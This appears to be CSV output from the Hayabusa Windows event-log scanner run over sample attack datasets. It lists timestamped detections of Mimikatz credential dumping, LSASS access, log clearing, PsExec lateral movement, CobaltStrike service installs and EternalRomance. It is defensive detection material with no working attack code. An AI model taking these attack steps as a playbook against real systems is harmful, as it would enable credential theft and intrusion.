2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe  :  URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe  :  URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\user03  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56661  :  LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: PSEXESVC.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: PSEXESVC.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56662  :  LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56663  :  LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56664  :  LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56666  :  LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: cmd.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: cmd.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx
2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: 0Konuy9q8HtkWeKS  :  IP Address: 10.23.123.11  :  Port: 41747  :  LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60163  :  LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60163  :  LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
